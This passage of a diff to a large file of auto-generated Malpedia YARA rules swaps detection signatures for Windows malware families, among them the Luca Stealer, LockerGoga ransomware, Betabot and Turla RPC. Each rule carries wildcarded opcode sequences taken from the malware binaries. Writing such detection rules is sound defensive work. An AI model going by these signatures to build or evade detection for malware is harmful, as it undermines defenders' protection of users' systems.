-		$sequence_6 = { 6a00 e8???????? c745fcffffffff 8b45dc 8b08 8b5104 8b440228 }
-		$sequence_7 = { 8d8424d0010000 50 89442430 e8???????? }
-		$sequence_8 = { 037dbc 8d5d94 8d75d4 e8???????? 8bf0 e8???????? 8b4dcc }
-		$sequence_9 = { 52 8d842434010000 50 8d4c2420 }
-		$sequence_10 = { 6a03 68000000c0 68???????? ff15???????? 6a02 }
-		$sequence_11 = { 837d1000 57 8bf9 7e5f 53 8b5d08 56 }
-		$sequence_12 = { 6a02 e8???????? 83bc24f000000010 8b8424dc000000 7307 8d8424dc000000 ffb424ec000000 }
-		$sequence_13 = { 59 5e 5b 8b8c243c010000 33cc e8???????? }
-		$sequence_14 = { 8b7d08 33db 68ff0f0000 8d8424cd000000 53 50 889c24d4000000 }
+		$sequence_0 = { 8b4608 57 57 57 50 }
+		$sequence_1 = { 33d5 8bee 81e5ff000000 c1ee08 3314adbcba6e00 8b28 }
+		$sequence_2 = { 8bf9 85c0 7505 e8???????? 8b442418 8b4c2414 }
+		$sequence_3 = { 8a83bc986e00 2bc8 8a11 eb02 32d2 8ac2 8aca }
+		$sequence_4 = { c1e604 0bce 7c0b 83f940 }
+		$sequence_5 = { ffd5 85c0 74d4 8b442438 85c0 74cc 03f0 }
+		$sequence_6 = { c1ee10 8bd7 81e6ff000000 c1ea08 8b2cb5bca16e00 81e2ff000000 }
+		$sequence_7 = { 8d4c2414 50 51 52 ff15???????? 85c0 7478 }
+		$sequence_8 = { 83c408 85c0 7451 8d8c24e0000000 68???????? 51 }
+		$sequence_9 = { f3ab 8d44241c 50 ff15???????? 8d4c2418 68???????? 51 }
 
 	condition:
-		7 of them and filesize < 1441792
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Korlia_Auto : FILE
+rule MALPEDIA_Win_Fanny_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "506d7e40-9719-5cd2-8082-4c83f4ea46d2"
+		id = "e9aa21a1-9e7c-5e0d-923d-00e6b6ec80ca"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.korlia_auto.yar#L1-L483"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fanny_auto.yar#L1-L171"
 		license_url = "N/A"
-		logic_hash = "35dbce2c60635b96058b21e359bfd25de3754320395854f3bf9872914070ac08"
+		logic_hash = "b1e6181f341236f9aaf561cfa6c0c3a83917a87202fe2ed6a96ef4c3d3c432e2"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -122328,75 +122269,38 @@ rule MALPEDIA_Win_Korlia_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a28 68???????? 6aff 53 }
-		$sequence_1 = { 8bfa f7ef c1fa14 8bc2 c1e81f }
-		$sequence_2 = { 0f9445e4 5b 59 5a c745fcffffffff }
-		$sequence_3 = { c3 85db 7410 6a28 }
-		$sequence_4 = { 53 6a00 6a00 ffd6 ff15???????? 8bf8 b83bd4b531 }
-		$sequence_5 = { 51 68???????? 68???????? ffd6 b905000000 }
-		$sequence_6 = { 85c0 7507 53 ff15???????? 55 }
-		$sequence_7 = { ffd6 8bc7 b980ee3600 99 f7f9 b873b2e745 }
-		$sequence_8 = { 53 6a01 53 53 53 51 ff15???????? }
-		$sequence_9 = { 8b442404 56 6a00 6a00 6a01 }
-		$sequence_10 = { 6a01 6a00 6a00 6800000040 50 ff15???????? 8bf0 }
-		$sequence_11 = { e8???????? 8a4c2404 6a01 884814 8b4c240c }
-		$sequence_12 = { 7423 8b542410 8b44240c 8d4c2408 6a00 51 }
-		$sequence_13 = { 8b4c240c 898840200000 58 c20800 e9???????? }
-		$sequence_14 = { 50 56 ff15???????? 56 ff15???????? b001 }
-		$sequence_15 = { 59 59 c3 8b65e8 ff7588 ff15???????? 833d????????ff }
-		$sequence_16 = { ff15???????? 833d????????ff 750c ff742404 ff15???????? 59 c3 }
-		$sequence_17 = { ff15???????? 8bf0 83feff 7423 8b542410 }
-		$sequence_18 = { f2ae f7d1 2bf9 6810270000 }
-		$sequence_19 = { ff742410 ff742410 ff742410 e8???????? c21000 e8???????? 8a4c2404 }
-		$sequence_20 = { 8bf9 81e7ff000000 03f2 03f7 }
-		$sequence_21 = { b8447c0000 e8???????? 53 56 57 }
-		$sequence_22 = { 6a00 680030c800 6a00 6a00 68???????? }
-		$sequence_23 = { 8b542438 83c504 50 895500 }
-		$sequence_24 = { 8d442444 894d00 8b542438 83c504 }
-		$sequence_25 = { 6a00 6880000000 6800000400 8bce e8???????? }
-		$sequence_26 = { ffd6 8d44240c 6804010000 50 }
-		$sequence_27 = { 51 ff15???????? a1???????? b981000000 }
-		$sequence_28 = { 6a00 6a00 6a00 50 8bce e8???????? 6a00 }
-		$sequence_29 = { 85c0 750c ff15???????? 53 }
-		$sequence_30 = { 7403 50 ffd6 b912010000 }
-		$sequence_31 = { 56 57 b940000000 8d7c2411 88442410 f3ab }
-		$sequence_32 = { ff15???????? 50 ff15???????? 68d0070000 ff15???????? }
-		$sequence_33 = { 8d4c2410 6804010000 51 aa ff15???????? }
-		$sequence_34 = { 3bc3 57 740b 8b35???????? 50 ffd6 }
-		$sequence_35 = { ffd6 eb06 8b35???????? a1???????? 3bc3 7403 50 }
-		$sequence_36 = { 83c414 e8???????? 6a00 6a00 8d542414 }
-		$sequence_37 = { 6a00 8d542414 6a00 52 68???????? 6a00 }
-		$sequence_38 = { 68???????? 6801000080 ff15???????? 85c0 0f8599000000 53 56 }
-		$sequence_39 = { 33c0 8dbc245e020000 66899c245c020000 f3ab }
-		$sequence_40 = { 56 68ff0f1f00 ff15???????? 85c0 740a 56 }
-		$sequence_41 = { f3ab aa b9f9000000 33c0 }
-		$sequence_42 = { 5e 24fe 5b 40 81c408010000 c3 83c8ff }
-		$sequence_43 = { 83c41c 8d5c1850 83c520 41 81fb00200000 }
-		$sequence_44 = { 52 ff15???????? 85c0 8945dc }
-		$sequence_45 = { e9???????? c745e0a08b4100 e9???????? c745e0a88b4100 e9???????? }
-		$sequence_46 = { 8d8c24782c0000 50 51 e8???????? 83c41c 85c0 7443 }
-		$sequence_47 = { 8a443b28 88443328 46 88543b28 81fe80000000 7ccb 8b4dfc }
-		$sequence_48 = { 68???????? 50 c745c8f4010000 ff15???????? 8b4dec 8bf0 51 }
-		$sequence_49 = { 57 8d1c8584bf4100 33c0 f00fb10b 8b15???????? 83cfff 8bca }
-		$sequence_50 = { c785e4edffff0c000000 c785e8edffff00000000 c785ecedffff01000000 ff15???????? 8d8580edffff 50 ff15???????? }
-		$sequence_51 = { 50 8d8424ac010000 50 51 }
-		$sequence_52 = { 83e908 8d7608 660fd60f 8d7f08 8b048d144e4000 ffe0 f7c703000000 }
+		$sequence_0 = { e8???????? 8d4dd8 e8???????? 8b45b4 }
+		$sequence_1 = { 8b7d0c 8bf7 8b4508 3bc3 0f84b8020000 }
+		$sequence_2 = { a2???????? 8d45fc 50 8d45f0 a4 6a08 50 }
+		$sequence_3 = { 57 895df0 740b c1e809 894df4 c1e009 eb03 }
+		$sequence_4 = { 5d c3 66c78594fbffff6800 b903000000 8dbd90fbffff 8db5d0fbffff 33d2 }
+		$sequence_5 = { 8b4c2408 33f6 8901 8bc6 }
+		$sequence_6 = { 50 6808100000 56 ffd7 8b0d???????? }
+		$sequence_7 = { 83780c00 7422 8b4dfc 83790400 7419 8b55fc 837a0800 }
+		$sequence_8 = { e8???????? 8b45d0 50 8b4d08 51 }
+		$sequence_9 = { 894508 8b5510 83ea05 895510 eb09 }
+		$sequence_10 = { e9???????? 8b5508 0fb602 3d90000000 753b 8b4d08 }
+		$sequence_11 = { f3ab 66ab aa 8a4508 }
+		$sequence_12 = { 5b 5d c3 55 8bec 83ec2c 8065ff00 }
+		$sequence_13 = { 832700 6800800000 6a00 53 ff15???????? }
+		$sequence_14 = { 8b45fc 83c012 50 ffd3 8bf0 59 }
+		$sequence_15 = { 8913 751b c745fc01000000 ff33 ff15???????? }
 
 	condition:
-		7 of them and filesize < 263168
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Turla_Rpc_Auto : FILE
+rule MALPEDIA_Win_Betabot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "555582c7-de4a-5625-91e9-ac0b0e0d564c"
+		id = "dcaf48d4-507f-5b26-9a58-f3ffaf812c78"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.turla_rpc_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.betabot_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "4906b07261ee80939dba34c531f28e5f2b514d7751640e2e81057387fedbb8f3"
+		logic_hash = "64a375dcaabd1648c075b4080e903b454efe58d8f528e81ccff7ee3035b4b817"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122410,38 +122314,32 @@ rule MALPEDIA_Win_Turla_Rpc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c785080100003025213c 66c7850c0100003a3b c6850e01000055 c745c007303431 }
-		$sequence_1 = { 488bd8 ffd3 488d4d70 488bf8 ffd3 }
-		$sequence_2 = { 660f6f05???????? 66c785ec0000000255 c785a0000000193a3431 c785a4000000193c3727 c785a800000034272c02 f30f7f8568010000 c685ac00000055 }
-		$sequence_3 = { c785c400000027273a27 c785c8000000183a3130 c685cc00000055 c785c001000030362155 c745d002273c21 c745d430133c39 66c745d83055 }
-		$sequence_4 = { 66c74424543155 c744243033273030 c644243455 c744244033263030 }
-		$sequence_5 = { c745b06970746f c745b472536163 66c745b86c00 ff15???????? }
-		$sequence_6 = { c7456016273034 c745642130133c c7456839300255 c7851001000016273034 c7851401000021300527 c785180100003a363026 }
-		$sequence_7 = { f30f7f8d98010000 c785b800000027273a27 c685bc00000055 c685d801000055 }
-		$sequence_8 = { c685d801000055 f30f7f85b0010000 660f6f05???????? c7858000000012302101 c7858400000030382505 }
-		$sequence_9 = { 68???????? 6a00 6a00 ff15???????? 6a00 6aff 68d2040000 }
-		$sequence_10 = { c745f474006c00 c785c8feffff14010000 ff15???????? 85c0 750e 50 50 }
-		$sequence_11 = { 8d45bc 50 ff15???????? 85c0 0f8581000000 }
-		$sequence_12 = { 7514 8d45ac 50 ff15???????? 8bf8 85ff 0f8434010000 }
-		$sequence_13 = { 5d c3 6a00 6800000080 6a02 }
-		$sequence_14 = { e8???????? cc 56 33f6 ffb614730110 ff15???????? }
-		$sequence_15 = { 833d????????00 0f85d3240000 ba05000000 8d0d10700110 e9???????? }
+		$sequence_0 = { f7d0 2345fc eb02 33c0 c9 c20800 55 }
+		$sequence_1 = { ff15???????? 85c0 7413 8d4df8 e8???????? 50 8d45f8 }
+		$sequence_2 = { 7440 8d45f4 50 8d45f8 50 ff75fc ff15???????? }
+		$sequence_3 = { 8bc6 83e80c 53 57 741d 48 7551 }
+		$sequence_4 = { 8bec 81ecac000000 8365f800 8365f000 8365f400 8365fc00 }
+		$sequence_5 = { ff15???????? 85c0 7504 6a06 eb11 68???????? }
+		$sequence_6 = { 741a 837df800 7414 8b45f8 8b4804 e8???????? 8945fc }
+		$sequence_7 = { a3???????? 8bc7 5f 5e 5d c20400 55 }
+		$sequence_8 = { ff15???????? 85c0 75df 6a32 58 ebdc 55 }
+		$sequence_9 = { 8d04b8 833800 7414 ff30 ff45fc e8???????? 8b460c }
 
 	condition:
-		7 of them and filesize < 311296
+		7 of them and filesize < 835584
 }
-rule MALPEDIA_Win_Chinotto_Auto : FILE
+rule MALPEDIA_Win_Client_Maximus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "35bb4fea-9679-5e3a-b2bd-3a05c48c1c83"
+		id = "38a249dd-6d8f-54ce-920d-61d566c5cc15"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinotto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chinotto_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.client_maximus_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "4531bba6bf5c08578cccf53130069c66edf41ca25754f112d734535821ebc612"
+		logic_hash = "5ff2445dece4914e3eb7fbfccded1318ff7646d3eb9b7b22684fe253e9bf4e40"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122455,32 +122353,32 @@ rule MALPEDIA_Win_Chinotto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4df0 897df4 895de4 8955f8 85c9 0f853dffffff e9???????? }
-		$sequence_1 = { 57 33f6 bf???????? 833cf5a4e6410001 751d 8d04f5a0e64100 8938 }
-		$sequence_2 = { 8985a8f6ffff 8d95b4f6ffff 52 8d85c4f6ffff 50 c785a0f6ffff0c000000 }
-		$sequence_3 = { c3 8b4d08 8b5648 8b45f4 c74638c0444000 897644 897a3c }
-		$sequence_4 = { 5d c3 8b4de0 8b55d8 8b45ec c1e106 034ddc }
-		$sequence_5 = { 8bd0 8955d8 eb03 8955d8 }
-		$sequence_6 = { 50 ff15???????? 8b853cf7ffff 03c3 50 e8???????? 8b8d38f7ffff }
-		$sequence_7 = { b969000000 66894de2 b96f000000 66894de4 b96e000000 66894de6 b93d000000 }
-		$sequence_8 = { 8b5628 6a58 6a01 51 }
-		$sequence_9 = { 6683f919 7725 8d4805 83f97a 7e08 83c0eb 0fb7c0 }
+		$sequence_0 = { 89542404 ff532c 8b5308 83c601 39730c }
+		$sequence_1 = { 8b4304 85c0 741d 8b5330 c744240800800000 c744240400000000 890424 }
+		$sequence_2 = { 890424 8954240c ff5320 ff15???????? 895c2408 }
+		$sequence_3 = { c70424???????? ffd0 a1???????? 85c0 7438 }
+		$sequence_4 = { e8???????? 8b4304 85c0 741d 8b5330 c744240800800000 c744240400000000 }
+		$sequence_5 = { 85c0 741d 8b5330 c744240800800000 }
+		$sequence_6 = { 7410 8b5330 890424 89542404 ff532c 8b5308 }
+		$sequence_7 = { 89c2 85d2 7409 c70424???????? ffd2 8d65f8 }
+		$sequence_8 = { 8b4628 85c0 7535 c70424???????? }
+		$sequence_9 = { 85c0 741d 8b5330 c744240800800000 c744240400000000 890424 }
 
 	condition:
-		7 of them and filesize < 300032
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Hamweq_Auto : FILE
+rule MALPEDIA_Win_Miragefox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "000e8959-0108-5c25-ad30-8e891fdada1d"
+		id = "845d5292-b7ea-5816-ae3f-26f365bc2587"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hamweq_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miragefox_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "5208d20513fd6a1e5edd1bc25c2bf088fa1869066d91ad8af3cf21319dcb16db"
+		logic_hash = "3f9732b4e7f509d0ad8d4d1803424245eb1ca2a613f2fd892ba39e0af22d7971"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122494,32 +122392,32 @@ rule MALPEDIA_Win_Hamweq_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff500c 56 e8???????? 8b06 }
-		$sequence_1 = { 8d8500feffff 50 ff5148 8b4e08 8b06 ff7138 }
-		$sequence_2 = { ff5744 50 8d8500feffff 50 }
-		$sequence_3 = { 51 ff5038 b906030000 33c0 80bdfcfdffff5c }
-		$sequence_4 = { 0f847a030000 85c0 0f8472030000 ff35???????? ff75f8 ffd6 }
-		$sequence_5 = { 50 8d45e0 50 ff750c 56 e8???????? 83c410 }
-		$sequence_6 = { ff7508 ff5020 8b4e08 8b06 ffb180010000 8d8decfeffff 51 }
-		$sequence_7 = { 8b0e ff30 33db ff5144 }
-		$sequence_8 = { 3ad0 742d 8b4c2414 8bd6 2bd1 8a19 3ad8 }
-		$sequence_9 = { 33c0 8dbdfcfdffff f3ab 8b4e08 8b06 ffb1e8000000 8d8dfcfdffff }
+		$sequence_0 = { 8945ca 8b45f4 83c036 66c745c8424d }
+		$sequence_1 = { 8b45e0 8b4df4 53 50 8d440828 50 }
+		$sequence_2 = { 8a8010132a00 83e00f eb02 33c0 0fbe84c130132a00 c1f804 }
+		$sequence_3 = { 8d45fc 50 e8???????? 59 8d44180c }
+		$sequence_4 = { 57 8d859c7cffff 6a00 50 e8???????? 57 }
+		$sequence_5 = { 2900 59 352900be35 2900 3236 2900 98 }
+		$sequence_6 = { 83c418 8d45ec 53 50 8d857cbcffff }
+		$sequence_7 = { 85c0 0f84be000000 8d85c0feffff 50 8d85b8fcffff 68???????? 50 }
+		$sequence_8 = { 83c01f 894d8c 99 59 8b75b8 f7f9 8b4df4 }
+		$sequence_9 = { 8d45f0 8975ec 50 8d45f8 }
 
 	condition:
-		7 of them and filesize < 24576
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Mangzamel_Auto : FILE
+rule MALPEDIA_Win_Dlrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eb9c7043-77a1-5f0e-9ec6-79bacd6f6a15"
+		id = "7bb91210-a1a6-58a8-9c5b-ff8edf88b110"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mangzamel_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dlrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dlrat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "1febff50405236297e35d0651b3a25a3fa9330c560b764c64ec02cac2724b444"
+		logic_hash = "a3f1e1206cd1c309e34cacc09c3103fc944a2e61c558b93390de2cb1efae2fc5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122533,32 +122431,32 @@ rule MALPEDIA_Win_Mangzamel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bce e8???????? 8b45dc 33ff 85c0 }
-		$sequence_1 = { e8???????? 8d8564ffffff c745e40d011133 50 e8???????? 83c428 40 }
-		$sequence_2 = { 57 8d4dec c645fc02 e8???????? 85c0 0f8e95000000 57 }
-		$sequence_3 = { 7412 ff7508 8d4e08 50 e8???????? 8b450c 894624 }
-		$sequence_4 = { 6aff 57 68???????? 8d4de4 e8???????? 8bce e8???????? }
-		$sequence_5 = { e8???????? 8d45ec 68???????? 50 e8???????? 83c41c 8d45ec }
-		$sequence_6 = { e8???????? 57 e8???????? 59 55 8d4b20 }
-		$sequence_7 = { 8bc8 c1e910 c1e818 880a 33ff 897514 8b4d14 }
-		$sequence_8 = { 8b06 8365fc00 8bce b301 ff5010 3d04000102 }
-		$sequence_9 = { eb34 68???????? 57 ffd6 59 85c0 59 }
+		$sequence_0 = { 488d0de60b1600 e8???????? 488975b0 4989d9 4531c0 baaa020000 488d0dcb0b1600 }
+		$sequence_1 = { 488d1df28e0500 48895dc8 48c745c011000000 488d55c0 488d0dcb8e0500 48894dd8 48c745d009000000 }
+		$sequence_2 = { e8???????? 85c0 7818 3de4000000 7311 4898 488d0d723b0100 }
+		$sequence_3 = { e8???????? 83fb01 7754 488d05aa270b00 488945a8 48c745a000000000 488d55a0 }
+		$sequence_4 = { 48ffc0 482bd8 48899df0fcffff 488b9de8fcffff 4803d8 48899df8fcffff 488d0513701600 }
+		$sequence_5 = { 488b8d20ffffff 4883ec20 e8???????? 4883c420 4889c2 488d0de71f1800 4883ec20 }
+		$sequence_6 = { 41c64424076c 41c644240863 41c644240979 41c644240a39 41c644240b6f 41c644240c5a 41c644240d57 }
+		$sequence_7 = { 488b03 488985a0fcffff 488995a8fcffff 488b3d???????? 488b97b0000000 488b87a8000000 488985b0fcffff }
+		$sequence_8 = { e8???????? 48c745b000000000 4c8bce 4c8bc3 ba2f070000 488d0d5e411500 e8???????? }
+		$sequence_9 = { ffc1 e8???????? 48894580 48895588 488d4580 48898520ffffff 488d1d6a691000 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 4121600
 }
-rule MALPEDIA_Win_Imprudentcook_Auto : FILE
+rule MALPEDIA_Win_Luca_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e985dc9d-907c-5ecd-b391-7678328944ea"
+		id = "962fd693-32a3-53ad-92cd-b5debbabca20"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.imprudentcook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.imprudentcook_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.luca_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.luca_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "df9f920c4e9fbf5202cbb078d209a88f010a87e5e4d8cea3492e3733d1c90a2b"
+		logic_hash = "41100df83b0cacd06b9716ae5b8e2710b883cf9f1a3da041c06d57097240cc33"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122572,32 +122470,32 @@ rule MALPEDIA_Win_Imprudentcook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 49f7d0 48c1ef20 498bc0 48897c2420 48f7f7 488bc8 }
-		$sequence_1 = { 4981fd541f0000 7c24 488d0c5b 4881f9aa0f0000 7c17 488bcf 48895c2420 }
-		$sequence_2 = { 4c8d45f8 488d550f 488d4de7 4889442420 e8???????? 488d4d1f ff15???????? }
-		$sequence_3 = { 7303 4d03d7 488bca 48c1ea20 418bc3 48c1e120 4803c8 }
-		$sequence_4 = { 4c8bc7 498bd7 488bce 4889442420 e8???????? eb10 488bf5 }
-		$sequence_5 = { 488d55e7 483bc1 498bca 7d12 488b45df 4c894c2428 4d8bc8 }
-		$sequence_6 = { 458bda 488bd0 4885c0 783d 482bc7 498d0cc4 498bc5 }
-		$sequence_7 = { 493b45f0 752b 4883c8ff 498bd5 498bce 492bd7 492bcf }
-		$sequence_8 = { 4d892cc4 4f8d2cfc 4c8bcf 4d8bc5 498bd4 e8???????? 488bdf }
-		$sequence_9 = { 488b8424a0000000 4d8bc4 4889442420 e8???????? 4883c450 415f 415e }
+		$sequence_0 = { eb0a f6471280 7504 6683e914 4d85f6 7416 6641395e10 }
+		$sequence_1 = { e8???????? 85c0 7428 85db 7524 488d0daee71600 e8???????? }
+		$sequence_2 = { e9???????? 4156 56 57 53 4883ec28 83791803 }
+		$sequence_3 = { e8???????? 4c8d4768 4889f1 ba03003000 e8???????? 4883c770 4889f1 }
+		$sequence_4 = { eb06 492130 412131 488b5c2430 8bc6 488b742438 488b7c2440 }
+		$sequence_5 = { 8d507e 448d4301 e8???????? 8b442458 448d4301 448bce 89442420 }
+		$sequence_6 = { e9???????? 48b8af39a3b04c5dea12 c3 56 4883ec20 4889ce 89f0 }
+		$sequence_7 = { ff15???????? 4438bfa8010000 740c 488b8fe8010000 e8???????? 488bcf e8???????? }
+		$sequence_8 = { e8???????? 488d8d60110000 e8???????? 488d8d501f0000 e8???????? 488d15683a2c00 488db560110000 }
+		$sequence_9 = { e9???????? 488d542468 48c70205000000 e9???????? 488d542468 48c70202000000 eb7d }
 
 	condition:
-		7 of them and filesize < 864256
+		7 of them and filesize < 9285632
 }
-rule MALPEDIA_Win_Buterat_Auto : FILE
+rule MALPEDIA_Win_Lockergoga_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0069324a-e70e-54da-b752-be0a297a08d5"
+		id = "c3b2e831-52cd-5711-8143-4c283c706434"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.buterat_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lockergoga_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "2a55e665ba3ad4c5f4e76ca6aa40a42d86bc8aa495194478ad6bc52271aa15de"
+		logic_hash = "679ed446af7bd76c538308594efebe8a71cc5f0a66dc5648e19b704e8ba83810"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122611,32 +122509,32 @@ rule MALPEDIA_Win_Buterat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7644 8b9ea05b4100 8d8e645a4100 8b11 395508 7305 895508 }
-		$sequence_1 = { 7e27 8b04b5e8034100 66833800 7508 8bc3 eb0d 33c0 }
-		$sequence_2 = { 85f6 7508 81ffb7000000 7514 8d8590f5ffff 50 be???????? }
-		$sequence_3 = { ff15???????? 85c0 8b4d14 8901 7505 2145fc }
-		$sequence_4 = { 85c0 0f849c010000 8d4dfc 51 53 68???????? e8???????? }
-		$sequence_5 = { 50 e8???????? 83c414 85c0 744e 68???????? 53 }
-		$sequence_6 = { 397df4 7477 813d????????60010000 7e6b 393d???????? 7463 bb00100000 }
-		$sequence_7 = { 8945fc 53 6800000080 53 53 ff7508 ff35???????? }
-		$sequence_8 = { 50 53 ffd7 b9???????? 8d8500f8ffff e8???????? 6a01 }
-		$sequence_9 = { c3 55 8bec b840180000 e8???????? ff15???????? 66833d????????00 }
+		$sequence_0 = { e8???????? 83c718 83c618 897dec 3bf3 75eb 8bc7 }
+		$sequence_1 = { 84c0 7405 8b7608 eb4e 8b8564ffffff 80780d00 743a }
+		$sequence_2 = { c645fc1b e8???????? 8d4db4 c645fc0e e8???????? 8b4d9c 8b06 }
+		$sequence_3 = { 56 83c0c8 50 e8???????? 837d9000 c745a800000000 0f8691000000 }
+		$sequence_4 = { 57 8d4d9c e8???????? 8b7da0 8b45cc c645fc0b }
+		$sequence_5 = { 8365ec00 ff75ec e8???????? 59 0fb6c0 85c0 7408 }
+		$sequence_6 = { 51 50 e8???????? 8b45ec 83c408 c7461000000000 c746140f000000 }
+		$sequence_7 = { 895108 50 8bce e8???????? 8b560c 8d4508 50 }
+		$sequence_8 = { 6a08 8975ec c7450800000000 c70600000000 c7460400000000 c7460800000000 c7460c00000000 }
+		$sequence_9 = { 8b4da0 c6400100 8808 e9???????? b8ffffff7f 2bc1 83f801 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 2588672
 }
-rule MALPEDIA_Win_Decaf_Auto : FILE
+rule MALPEDIA_Win_Paladin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c019d263-a899-5660-aa15-798e52adcd92"
+		id = "ea744185-35d7-56b0-b303-642060848578"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.decaf"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.decaf_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.paladin_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "8c05c17767eead1f69d9ac7eb9dd704aba24d34223075b108957952ecaf7a6e5"
